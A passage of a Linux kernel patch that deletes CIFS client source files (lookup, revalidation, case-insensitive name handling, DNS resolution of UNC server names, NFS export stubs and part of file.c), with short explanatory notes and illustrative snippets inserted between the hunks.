+-	   we already hold the sb rename sem */
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		cifs_put_tlink(tlink);
+-		free_xid(xid);
+-		free_dentry_path(page);
+-		return ERR_CAST(full_path);
+-	}
+-
+-	if (d_really_is_positive(direntry)) {
+-		cifs_dbg(FYI, "non-NULL inode in lookup\n");
+-	} else {
+-		cifs_dbg(FYI, "NULL inode in lookup\n");
+-	}
+-	cifs_dbg(FYI, "Full path: %s inode = 0x%p\n",
+-		 full_path, d_inode(direntry));
+-
+-again:
+-	if (pTcon->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&newInode, full_path, parent_dir_inode->i_sb, xid);
+-	else if (pTcon->unix_ext) {
+-		rc = cifs_get_inode_info_unix(&newInode, full_path,
+-					      parent_dir_inode->i_sb, xid);
+-	} else {
+-		rc = cifs_get_inode_info(&newInode, full_path, NULL,
+-				parent_dir_inode->i_sb, xid, NULL);
+-	}
+-
+-	if (rc == 0) {
+-		/* since paths are not looked up by component - the parent
+-		   directories are presumed to be good here */
+-		renew_parental_timestamps(direntry);
+-	} else if (rc == -EAGAIN && retry_count++ < 10) {
+-		goto again;
+-	} else if (rc == -ENOENT) {
+-		cifs_set_time(direntry, jiffies);
+-		newInode = NULL;
+-	} else {
+-		if (rc != -EACCES) {
+-			cifs_dbg(FYI, "Unexpected lookup error %d\n", rc);
+-			/* We special case check for Access Denied - since that
+-			is a common return code */
+-		}
+-		newInode = ERR_PTR(rc);
+-	}
+-	free_dentry_path(page);
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-	return d_splice_alias(newInode, direntry);
+-}
+-
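cifs_lookup() above retries transient -EAGAIN failures from the inode-info calls at most ten times before giving up. The core of that pattern, with do_query() as a hypothetical stand-in for the three get-info variants:

	int retry_count = 0;
again:
	rc = do_query();			/* hypothetical stand-in */
	if (rc == -EAGAIN && retry_count++ < 10)
		goto again;			/* bounded retry, no unbounded spin */
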
+-static int
+-cifs_d_revalidate(struct dentry *direntry, unsigned int flags)
+-{
+-	struct inode *inode;
+-	int rc;
+-
+-	if (flags & LOOKUP_RCU)
+-		return -ECHILD;
+-
+-	if (d_really_is_positive(direntry)) {
+-		inode = d_inode(direntry);
+-		if ((flags & LOOKUP_REVAL) && !CIFS_CACHE_READ(CIFS_I(inode)))
+-			CIFS_I(inode)->time = 0; /* force reval */
+-
+-		rc = cifs_revalidate_dentry(direntry);
+-		if (rc) {
+-			cifs_dbg(FYI, "cifs_revalidate_dentry failed with rc=%d", rc);
+-			switch (rc) {
+-			case -ENOENT:
+-			case -ESTALE:
+-				/*
+-				 * Those errors mean the dentry is invalid
+-				 * (file was deleted or recreated)
+-				 */
+-				return 0;
+-			default:
+-				/*
+-				 * Otherwise some unexpected error happened
+-				 * report it as-is to VFS layer
+-				 */
+-				return rc;
+-			}
+-		} else {
+-			/*
+-			 * If the inode wasn't known to be a dfs entry when
+-			 * the dentry was instantiated, such as when created
+-			 * via ->readdir(), it needs to be set now since the
+-			 * attributes will have been updated by
+-			 * cifs_revalidate_dentry().
+-			 */
+-			if (IS_AUTOMOUNT(inode) &&
+-			   !(direntry->d_flags & DCACHE_NEED_AUTOMOUNT)) {
+-				spin_lock(&direntry->d_lock);
+-				direntry->d_flags |= DCACHE_NEED_AUTOMOUNT;
+-				spin_unlock(&direntry->d_lock);
+-			}
+-
+-			return 1;
+-		}
+-	}
+-
+-	/*
+-	 * This may be nfsd (or something); in any case, we can't tell the
+-	 * intent of the lookup. Since it can be for creation, drop it.
+-	 */
+-	if (!flags)
+-		return 0;
+-
+-	/*
+-	 * Drop the negative dentry, in order to make sure to use the
+-	 * case sensitive name which is specified by user if this is
+-	 * for creation.
+-	 */
+-	if (flags & (LOOKUP_CREATE | LOOKUP_RENAME_TARGET))
+-		return 0;
+-
+-	if (time_after(jiffies, cifs_get_time(direntry) + HZ) || !lookupCacheEnabled)
+-		return 0;
+-
+-	return 1;
+-}
+-
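cifs_d_revalidate() follows the usual ->d_revalidate contract: return 1 to keep the dentry, 0 to have the VFS drop it and redo the lookup, or a negative error to propagate. A skeleton of that contract (still_valid() is a hypothetical check, not part of this patch):

	static int example_d_revalidate(struct dentry *d, unsigned int flags)
	{
		if (flags & LOOKUP_RCU)
			return -ECHILD;	/* cannot sleep in RCU-walk; retry in ref-walk */
		if (still_valid(d))	/* hypothetical revalidation check */
			return 1;	/* keep the cached dentry */
		return 0;		/* drop it; VFS performs a fresh lookup */
	}
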
+-/* static int cifs_d_delete(struct dentry *direntry)
+-{
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "In cifs d_delete, name = %pd\n", direntry);
+-
+-	return rc;
+-}     */
+-
+-const struct dentry_operations cifs_dentry_ops = {
+-	.d_revalidate = cifs_d_revalidate,
+-	.d_automount = cifs_dfs_d_automount,
+-/* d_delete:       cifs_d_delete,      */ /* not needed except for debugging */
+-};
+-
+-static int cifs_ci_hash(const struct dentry *dentry, struct qstr *q)
+-{
+-	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
+-	unsigned long hash;
+-	wchar_t c;
+-	int i, charlen;
+-
+-	hash = init_name_hash(dentry);
+-	for (i = 0; i < q->len; i += charlen) {
+-		charlen = codepage->char2uni(&q->name[i], q->len - i, &c);
+-		/* error out if we can't convert the character */
+-		if (unlikely(charlen < 0))
+-			return charlen;
+-		hash = partial_name_hash(cifs_toupper(c), hash);
+-	}
+-	q->hash = end_name_hash(hash);
+-
+-	return 0;
+-}
+-
+-static int cifs_ci_compare(const struct dentry *dentry,
+-		unsigned int len, const char *str, const struct qstr *name)
+-{
+-	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
+-	wchar_t c1, c2;
+-	int i, l1, l2;
+-
+-	/*
+-	 * We make the assumption here that uppercase characters in the local
+-	 * codepage are always the same length as their lowercase counterparts.
+-	 *
+-	 * If that's ever not the case, then this will fail to match it.
+-	 */
+-	if (name->len != len)
+-		return 1;
+-
+-	for (i = 0; i < len; i += l1) {
+-		/* Convert characters in both strings to UTF-16. */
+-		l1 = codepage->char2uni(&str[i], len - i, &c1);
+-		l2 = codepage->char2uni(&name->name[i], name->len - i, &c2);
+-
+-		/*
+-		 * If we can't convert either character, just declare it to
+-		 * be 1 byte long and compare the original byte.
+-		 */
+-		if (unlikely(l1 < 0 && l2 < 0)) {
+-			if (str[i] != name->name[i])
+-				return 1;
+-			l1 = 1;
+-			continue;
+-		}
+-
+-		/*
+-		 * Here, we again ass|u|me that upper/lowercase versions of
+-		 * a character are the same length in the local NLS.
+-		 */
+-		if (l1 != l2)
+-			return 1;
+-
+-		/* Now compare uppercase versions of these characters */
+-		if (cifs_toupper(c1) != cifs_toupper(c2))
+-			return 1;
+-	}
+-
+-	return 0;
+-}
+-
+-const struct dentry_operations cifs_ci_dentry_ops = {
+-	.d_revalidate = cifs_d_revalidate,
+-	.d_hash = cifs_ci_hash,
+-	.d_compare = cifs_ci_compare,
+-	.d_automount = cifs_dfs_d_automount,
+-};
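The case-insensitive dentry operations above fold every character to upper case before hashing and comparing, so names differing only in case hash to the same bucket and compare equal. The same idea over plain ASCII (the removed code works on NLS-decoded wide characters instead) might look like:

	#include <ctype.h>
	#include <string.h>

	/* 0 if the names match case-insensitively, 1 otherwise */
	static int ci_compare(const char *a, const char *b)
	{
		size_t i, la = strlen(a);

		if (la != strlen(b))
			return 1;
		for (i = 0; i < la; i++)
			if (toupper((unsigned char)a[i]) !=
			    toupper((unsigned char)b[i]))
				return 1;
		return 0;
	}
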
+diff --git a/fs/cifs/dns_resolve.c b/fs/cifs/dns_resolve.c
+deleted file mode 100644
+index 0458d28d71aa6..0000000000000
+--- a/fs/cifs/dns_resolve.c
++++ /dev/null
+@@ -1,89 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (c) 2007 Igor Mammedov
+- *   Author(s): Igor Mammedov (niallain@gmail.com)
+- *              Steve French (sfrench@us.ibm.com)
+- *              Wang Lei (wang840925@gmail.com)
+- *		David Howells (dhowells@redhat.com)
+- *
+- *   Contains the CIFS DFS upcall routines used for hostname to
+- *   IP address translation.
+- *
+- */
+-
+-#include <linux/slab.h>
+-#include <linux/dns_resolver.h>
+-#include "dns_resolve.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-
+-/**
+- * dns_resolve_server_name_to_ip - Resolve UNC server name to ip address.
+- * @unc: UNC path specifying the server (with '/' as delimiter)
+- * @ip_addr: Where to return the IP address.
+- * @expiry: Where to return the expiry time for the dns record.
+- *
+- * The IP address will be returned in string form, and the caller is
+- * responsible for freeing it.
+- *
+- * Returns length of result on success, -ve on error.
+- */
+-int
+-dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry)
+-{
+-	struct sockaddr_storage ss;
+-	const char *hostname, *sep;
+-	char *name;
+-	int len, rc;
+-
+-	if (!ip_addr || !unc)
+-		return -EINVAL;
+-
+-	len = strlen(unc);
+-	if (len < 3) {
+-		cifs_dbg(FYI, "%s: unc is too short: %s\n", __func__, unc);
+-		return -EINVAL;
+-	}
+-
+-	/* Discount leading slashes for cifs */
+-	len -= 2;
+-	hostname = unc + 2;
+-
+-	/* Search for server name delimiter */
+-	sep = memchr(hostname, '/', len);
+-	if (sep)
+-		len = sep - hostname;
+-	else
+-		cifs_dbg(FYI, "%s: probably server name is whole unc: %s\n",
+-			 __func__, unc);
+-
+-	/* Try to interpret hostname as an IPv4 or IPv6 address */
+-	rc = cifs_convert_address((struct sockaddr *)&ss, hostname, len);
+-	if (rc > 0)
+-		goto name_is_IP_address;
+-
+-	/* Perform the upcall */
+-	rc = dns_query(current->nsproxy->net_ns, NULL, hostname, len,
+-		       NULL, ip_addr, expiry, false);
+-	if (rc < 0)
+-		cifs_dbg(FYI, "%s: unable to resolve: %*.*s\n",
+-			 __func__, len, len, hostname);
+-	else
+-		cifs_dbg(FYI, "%s: resolved: %*.*s to %s expiry %llu\n",
+-			 __func__, len, len, hostname, *ip_addr,
+-			 expiry ? (*expiry) : 0);
+-	return rc;
+-
+-name_is_IP_address:
+-	name = kmalloc(len + 1, GFP_KERNEL);
+-	if (!name)
+-		return -ENOMEM;
+-	memcpy(name, hostname, len);
+-	name[len] = 0;
+-	cifs_dbg(FYI, "%s: unc is IP, skipping dns upcall: %s\n",
+-		 __func__, name);
+-	*ip_addr = name;
+-	return 0;
+-}
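dns_resolve_server_name_to_ip() carves the host out of a UNC path by skipping the two leading slashes and cutting at the next '/'. That parsing step in isolation (assuming the caller has already checked that the string is at least three characters long, as the removed code does):

	#include <string.h>

	/* return the host portion of "//server/share/...", length in *len */
	static const char *unc_host(const char *unc, size_t *len)
	{
		const char *host = unc + 2;	/* skip leading "//" */
		const char *sep = memchr(host, '/', strlen(host));

		*len = sep ? (size_t)(sep - host) : strlen(host);
		return host;
	}
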
+diff --git a/fs/cifs/dns_resolve.h b/fs/cifs/dns_resolve.h
+deleted file mode 100644
+index afc0df381246b..0000000000000
+--- a/fs/cifs/dns_resolve.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *   DNS Resolver upcall management for CIFS DFS
+- *   Handles host name to IP address resolution
+- *
+- *   Copyright (c) International Business Machines  Corp., 2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _DNS_RESOLVE_H
+-#define _DNS_RESOLVE_H
+-
+-#ifdef __KERNEL__
+-extern int dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry);
+-#endif /* KERNEL */
+-
+-#endif /* _DNS_RESOLVE_H */
+diff --git a/fs/cifs/export.c b/fs/cifs/export.c
+deleted file mode 100644
+index 37c28415df1e0..0000000000000
+--- a/fs/cifs/export.c
++++ /dev/null
+@@ -1,54 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Common Internet FileSystem (CIFS) client
+- *
+- *   Operations related to support for exporting files via NFSD
+- *
+- */
+-
+- /*
+-  * See Documentation/filesystems/nfs/exporting.rst
+-  * and examples in fs/exportfs
+-  *
+-  * Since cifs is a network file system, an "fsid" must be included for
+-  * any nfs exports file entries which refer to cifs paths.  In addition
+-  * the cifs mount must be mounted with the "serverino" option (ie use stable
+-  * server inode numbers instead of locally generated temporary ones).
+-  * Although cifs inodes do not use generation numbers (have generation number
+-  * of zero) - the inode number alone should be good enough for simple cases
+-  * in which users want to export cifs shares with NFS. The decode and encode
+-  * could be improved by using a new routine which expects 64 bit inode numbers
+-  * instead of the default 32 bit routines in fs/exportfs
+-  *
+-  */
+-
+-#include <linux/fs.h>
+-#include <linux/exportfs.h>
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifsfs.h"
+-
+-#ifdef CONFIG_CIFS_NFSD_EXPORT
+-static struct dentry *cifs_get_parent(struct dentry *dentry)
+-{
+-	/* BB need to add code here eventually to enable export via NFSD */
+-	cifs_dbg(FYI, "get parent for %p\n", dentry);
+-	return ERR_PTR(-EACCES);
+-}
+-
+-const struct export_operations cifs_export_ops = {
+-	.get_parent = cifs_get_parent,
+-/*	Following five export operations are unneeded so far and can default:
+-	.get_dentry =
+-	.get_name =
+-	.find_exported_dentry =
+-	.decode_fh =
+-	.encode_fh =  */
+-};
+-
+-#endif /* CONFIG_CIFS_NFSD_EXPORT */
+-
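As the comment block in export.c notes, exporting a CIFS mount through NFSD requires a stable identity: the cifs mount needs serverino (stable server inode numbers) and the exports entry needs an explicit fsid. An illustrative pair of lines (not part of this patch):

	mount -t cifs //server/share /mnt/cifs -o serverino
	# /etc/exports: fsid is mandatory since cifs has no stable device number
	/mnt/cifs  *(ro,fsid=101)
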
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+deleted file mode 100644
+index 87dcffece7623..0000000000000
+--- a/fs/cifs/file.c
++++ /dev/null
+@@ -1,5290 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   vfs operations that deal with files
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2010
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/backing-dev.h>
+-#include <linux/stat.h>
+-#include <linux/fcntl.h>
+-#include <linux/pagemap.h>
+-#include <linux/pagevec.h>
+-#include <linux/writeback.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include <linux/delay.h>
+-#include <linux/mount.h>
+-#include <linux/slab.h>
+-#include <linux/swap.h>
+-#include <linux/mm.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "fscache.h"
+-#include "smbdirect.h"
+-#include "fs_context.h"
+-#include "cifs_ioctl.h"
+-#include "cached_dir.h"
+-
+-/*
+- * Mark as invalid, all open files on tree connections since they
+- * were closed when session to server was lost.
+- */
+-void
+-cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
+-{
+-	struct cifsFileInfo *open_file = NULL;
+-	struct list_head *tmp;
+-	struct list_head *tmp1;
+-
+-	/* only send once per connect */
+-	spin_lock(&tcon->ses->ses_lock);
+-	if ((tcon->ses->ses_status != SES_GOOD) || (tcon->status != TID_NEED_RECON)) {
+-		spin_unlock(&tcon->ses->ses_lock);
+-		return;
+-	}
+-	tcon->status = TID_IN_FILES_INVALIDATE;
+-	spin_unlock(&tcon->ses->ses_lock);
+-
+-	/* list all files open on tree connection and mark them invalid */
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_safe(tmp, tmp1, &tcon->openFileList) {
+-		open_file = list_entry(tmp, struct cifsFileInfo, tlist);
+-		open_file->invalidHandle = true;
+-		open_file->oplock_break_cancelled = true;
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	invalidate_all_cached_dirs(tcon);
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->status == TID_IN_FILES_INVALIDATE)
+-		tcon->status = TID_NEED_TCON;
+-	spin_unlock(&tcon->tc_lock);
+-
+-	/*
+-	 * BB Add call to invalidate_inodes(sb) for all superblocks mounted
+-	 * to this tcon.
+-	 */
+-}
+-
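cifs_mark_open_files_invalid() uses the intermediate TID_IN_FILES_INVALIDATE status so that only one task performs the invalidation, and the final status is set only if nothing changed it in the meantime. The shape of that guard, abstracted into pseudo-C with names taken from the removed function:

	spin_lock(&ses_lock);
	if (status != TID_NEED_RECON) {		/* another task got here first */
		spin_unlock(&ses_lock);
		return;
	}
	status = TID_IN_FILES_INVALIDATE;	/* claim the work */
	spin_unlock(&ses_lock);

	/* ...invalidate open files without holding the lock... */

	spin_lock(&tc_lock);
	if (status == TID_IN_FILES_INVALIDATE)	/* still ours? */
		status = TID_NEED_TCON;
	spin_unlock(&tc_lock);
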
+-static inline int cifs_convert_flags(unsigned int flags)
+-{
+-	if ((flags & O_ACCMODE) == O_RDONLY)
+-		return GENERIC_READ;
+-	else if ((flags & O_ACCMODE) == O_WRONLY)
+-		return GENERIC_WRITE;
+-	else if ((flags & O_ACCMODE) == O_RDWR) {
+-		/* GENERIC_ALL is too much permission to request; it
+-		   can cause an unnecessary access denied on create */
+-		/* return GENERIC_ALL; */
+-		return (GENERIC_READ | GENERIC_WRITE);
+-	}
+-
+-	return (READ_CONTROL | FILE_WRITE_ATTRIBUTES | FILE_READ_ATTRIBUTES |
+-		FILE_WRITE_EA | FILE_APPEND_DATA | FILE_WRITE_DATA |
+-		FILE_READ_DATA);
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static u32 cifs_posix_convert_flags(unsigned int flags)
+-{
+-	u32 posix_flags = 0;
+-
+-	if ((flags & O_ACCMODE) == O_RDONLY)
+-		posix_flags = SMB_O_RDONLY;
+-	else if ((flags & O_ACCMODE) == O_WRONLY)
+-		posix_flags = SMB_O_WRONLY;
+-	else if ((flags & O_ACCMODE) == O_RDWR)
+-		posix_flags = SMB_O_RDWR;
+-
+-	if (flags & O_CREAT) {
+-		posix_flags |= SMB_O_CREAT;
+-		if (flags & O_EXCL)
+-			posix_flags |= SMB_O_EXCL;
+-	} else if (flags & O_EXCL)
+-		cifs_dbg(FYI, "Application %s pid %d has incorrectly set O_EXCL flag but not O_CREAT on file open. Ignoring O_EXCL\n",
+-			 current->comm, current->tgid);
+-
+-	if (flags & O_TRUNC)
+-		posix_flags |= SMB_O_TRUNC;
+-	/* be safe and imply O_SYNC for O_DSYNC */
+-	if (flags & O_DSYNC)
+-		posix_flags |= SMB_O_SYNC;
+-	if (flags & O_DIRECTORY)
+-		posix_flags |= SMB_O_DIRECTORY;
+-	if (flags & O_NOFOLLOW)
+-		posix_flags |= SMB_O_NOFOLLOW;
+-	if (flags & O_DIRECT)
+-		posix_flags |= SMB_O_DIRECT;
+-
+-	return posix_flags;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static inline int cifs_get_disposition(unsigned int flags)
+-{
+-	if ((flags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+-		return FILE_CREATE;
+-	else if ((flags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
+-		return FILE_OVERWRITE_IF;
+-	else if ((flags & O_CREAT) == O_CREAT)
+-		return FILE_OPEN_IF;
+-	else if ((flags & O_TRUNC) == O_TRUNC)
+-		return FILE_OVERWRITE;
+-	else
+-		return FILE_OPEN;
+-}
+-
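For the common open(2) flag combinations, cifs_get_disposition() above therefore maps:

	cifs_get_disposition(O_CREAT | O_EXCL);		/* FILE_CREATE */
	cifs_get_disposition(O_CREAT | O_TRUNC);	/* FILE_OVERWRITE_IF */
	cifs_get_disposition(O_CREAT);			/* FILE_OPEN_IF */
	cifs_get_disposition(O_TRUNC);			/* FILE_OVERWRITE */
	cifs_get_disposition(0);			/* FILE_OPEN */
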
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-int cifs_posix_open(const char *full_path, struct inode **pinode,
+-			struct super_block *sb, int mode, unsigned int f_flags,
+-			__u32 *poplock, __u16 *pnetfid, unsigned int xid)
+-{
+-	int rc;
+-	FILE_UNIX_BASIC_INFO *presp_data;
+-	__u32 posix_flags = 0;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_fattr fattr;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-
+-	cifs_dbg(FYI, "posix open %s\n", full_path);
+-
+-	presp_data = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
+-	if (presp_data == NULL)
+-		return -ENOMEM;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto posix_open_ret;
+-	}
+-
+-	tcon = tlink_tcon(tlink);
+-	mode &= ~current_umask();
+-
+-	posix_flags = cifs_posix_convert_flags(f_flags);
+-	rc = CIFSPOSIXCreate(xid, tcon, posix_flags, mode, pnetfid, presp_data,
+-			     poplock, full_path, cifs_sb->local_nls,
+-			     cifs_remap(cifs_sb));
+-	cifs_put_tlink(tlink);
+-
+-	if (rc)
+-		goto posix_open_ret;
+-
+-	if (presp_data->Type == cpu_to_le32(-1))
+-		goto posix_open_ret; /* open ok, caller does qpathinfo */
+-
+-	if (!pinode)
+-		goto posix_open_ret; /* caller does not need info */
+-
+-	cifs_unix_basic_to_fattr(&fattr, presp_data, cifs_sb);
+-
+-	/* get new inode and set it up */
+-	if (*pinode == NULL) {
+-		cifs_fill_uniqueid(sb, &fattr);
+-		*pinode = cifs_iget(sb, &fattr);
+-		if (!*pinode) {
+-			rc = -ENOMEM;
+-			goto posix_open_ret;
+-		}
+-	} else {
+-		cifs_revalidate_mapping(*pinode);
+-		rc = cifs_fattr_to_inode(*pinode, &fattr);
+-	}
+-
+-posix_open_ret:
+-	kfree(presp_data);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_sb_info *cifs_sb,
+-			struct cifs_tcon *tcon, unsigned int f_flags, __u32 *oplock,
+-			struct cifs_fid *fid, unsigned int xid, struct cifs_open_info_data *buf)
+-{
+-	int rc;
+-	int desired_access;
+-	int disposition;
+-	int create_options = CREATE_NOT_DIR;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifs_open_parms oparms;
+-
+-	if (!server->ops->open)
+-		return -ENOSYS;
+-
+-	desired_access = cifs_convert_flags(f_flags);
+-
+-/*********************************************************************
+- *  open flag mapping table:
+- *
+- *	POSIX Flag            CIFS Disposition
+- *	----------            ----------------
+- *	O_CREAT               FILE_OPEN_IF
+- *	O_CREAT | O_EXCL      FILE_CREATE
+- *	O_CREAT | O_TRUNC     FILE_OVERWRITE_IF
+- *	O_TRUNC               FILE_OVERWRITE
+- *	none of the above     FILE_OPEN
+- *
+- *	Note that there is no direct match for the disposition
+- *	FILE_SUPERSEDE (ie create whether or not the file exists);
+- *	O_CREAT | O_TRUNC is similar, but it truncates the existing
+- *	file rather than creating a new file as FILE_SUPERSEDE does
+- *	(which uses the attributes / metadata passed in on the open call)
+- *?
+- *?  O_SYNC is a reasonable match to CIFS writethrough flag
+- *?  and the read write flags match reasonably.  O_LARGEFILE
+- *?  is irrelevant because largefile support is always used
+- *?  by this client. Flags O_APPEND, O_DIRECT, O_DIRECTORY,
+- *	 O_FASYNC, O_NOFOLLOW, O_NONBLOCK need further investigation
+- *********************************************************************/
+-
+-	disposition = cifs_get_disposition(f_flags);
+-
+-	/* BB pass O_SYNC flag through on file attributes .. BB */
+-
+-	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
+-	if (f_flags & O_SYNC)
+-		create_options |= CREATE_WRITE_THROUGH;
+-
+-	if (f_flags & O_DIRECT)
+-		create_options |= CREATE_NO_BUFFER;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = desired_access,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.disposition = disposition,
+-		.path = full_path,
+-		.fid = fid,
+-	};
+-
+-	rc = server->ops->open(xid, &oparms, oplock, buf);
+-	if (rc)
+-		return rc;
+-
+-	/* TODO: Add support for calling posix query info, but passing in the fid */
+-	if (tcon->unix_ext)
+-		rc = cifs_get_inode_info_unix(&inode, full_path, inode->i_sb,
+-					      xid);
+-	else
+-		rc = cifs_get_inode_info(&inode, full_path, buf, inode->i_sb,
+-					 xid, fid);
+-
+-	if (rc) {
+-		server->ops->close(xid, tcon, fid);
+-		if (rc == -ESTALE)
+-			rc = -EOPENSTALE;
+-	}
+-
+-	return rc;
+-}
+-
+-static bool
+-cifs_has_mand_locks(struct cifsInodeInfo *cinode)
+-{
+-	struct cifs_fid_locks *cur;
+-	bool has_locks = false;
+-
+-	down_read(&cinode->lock_sem);
+-	list_for_each_entry(cur, &cinode->llist, llist) {
+-		if (!list_empty(&cur->locks)) {
+-			has_locks = true;
+-			break;
+-		}
+-	}
+-	up_read(&cinode->lock_sem);
+-	return has_locks;
+-}
+-
+-void
+-cifs_down_write(struct rw_semaphore *sem)
+-{
+-	while (!down_write_trylock(sem))
+-		msleep(10);
+-}
+-
+-static void cifsFileInfo_put_work(struct work_struct *work);
+-
+-struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
+-				       struct tcon_link *tlink, __u32 oplock,
+-				       const char *symlink_target)
+-{
+-	struct dentry *dentry = file_dentry(file);
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifsFileInfo *cfile;
+-	struct cifs_fid_locks *fdlocks;
+-	struct cifs_tcon *tcon = tlink_tcon(tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	cfile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
+-	if (cfile == NULL)
+-		return cfile;
+-
+-	fdlocks = kzalloc(sizeof(struct cifs_fid_locks), GFP_KERNEL);
+-	if (!fdlocks) {
+-		kfree(cfile);
+-		return NULL;
+-	}
+-
+-	if (symlink_target) {
+-		cfile->symlink_target = kstrdup(symlink_target, GFP_KERNEL);
+-		if (!cfile->symlink_target) {
+-			kfree(fdlocks);
+-			kfree(cfile);
+-			return NULL;
+-		}
+-	}
+-
+-	INIT_LIST_HEAD(&fdlocks->locks);
+-	fdlocks->cfile = cfile;
+-	cfile->llist = fdlocks;
+-
+-	cfile->count = 1;
+-	cfile->pid = current->tgid;
+-	cfile->uid = current_fsuid();
+-	cfile->dentry = dget(dentry);
+-	cfile->f_flags = file->f_flags;
+-	cfile->invalidHandle = false;
+-	cfile->deferred_close_scheduled = false;
+-	cfile->tlink = cifs_get_tlink(tlink);
+-	INIT_WORK(&cfile->oplock_break, cifs_oplock_break);
+-	INIT_WORK(&cfile->put, cifsFileInfo_put_work);
+-	INIT_DELAYED_WORK(&cfile->deferred, smb2_deferred_work_close);
+-	mutex_init(&cfile->fh_mutex);
+-	spin_lock_init(&cfile->file_info_lock);
+-
+-	cifs_sb_active(inode->i_sb);
+-
+-	/*
+-	 * If the server returned a read oplock and we have mandatory brlocks,
+-	 * set oplock level to None.
+-	 */
+-	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
+-		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
+-		oplock = 0;
+-	}
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	list_add(&fdlocks->llist, &cinode->llist);
+-	up_write(&cinode->lock_sem);
+-
+-	spin_lock(&tcon->open_file_lock);
+-	if (fid->pending_open->oplock != CIFS_OPLOCK_NO_CHANGE && oplock)
+-		oplock = fid->pending_open->oplock;
+-	list_del(&fid->pending_open->olist);
+-
+-	fid->purge_cache = false;
+-	server->ops->set_fid(cfile, fid, oplock);
+-
+-	list_add(&cfile->tlist, &tcon->openFileList);
+-	atomic_inc(&tcon->num_local_opens);
+-
+-	/* if this is a readable file instance, put it first in the list */
+-	spin_lock(&cinode->open_file_lock);
+-	if (file->f_mode & FMODE_READ)
+-		list_add(&cfile->flist, &cinode->openFileList);
+-	else
+-		list_add_tail(&cfile->flist, &cinode->openFileList);
+-	spin_unlock(&cinode->open_file_lock);
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	if (fid->purge_cache)
+-		cifs_zap_mapping(inode);
+-
+-	file->private_data = cfile;
+-	return cfile;
+-}
+-
+-struct cifsFileInfo *
+-cifsFileInfo_get(struct cifsFileInfo *cifs_file)
+-{
+-	spin_lock(&cifs_file->file_info_lock);
+-	cifsFileInfo_get_locked(cifs_file);
+-	spin_unlock(&cifs_file->file_info_lock);
+-	return cifs_file;
+-}
+-
+-static void cifsFileInfo_put_final(struct cifsFileInfo *cifs_file)
+-{
+-	struct inode *inode = d_inode(cifs_file->dentry);
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct cifsLockInfo *li, *tmp;
+-	struct super_block *sb = inode->i_sb;
+-
+-	/*
+-	 * Delete any outstanding lock records. We'll lose them when the file
+-	 * is closed anyway.
+-	 */
+-	cifs_down_write(&cifsi->lock_sem);
+-	list_for_each_entry_safe(li, tmp, &cifs_file->llist->locks, llist) {
+-		list_del(&li->llist);
+-		cifs_del_lock_waiters(li);
+-		kfree(li);
+-	}
+-	list_del(&cifs_file->llist->llist);
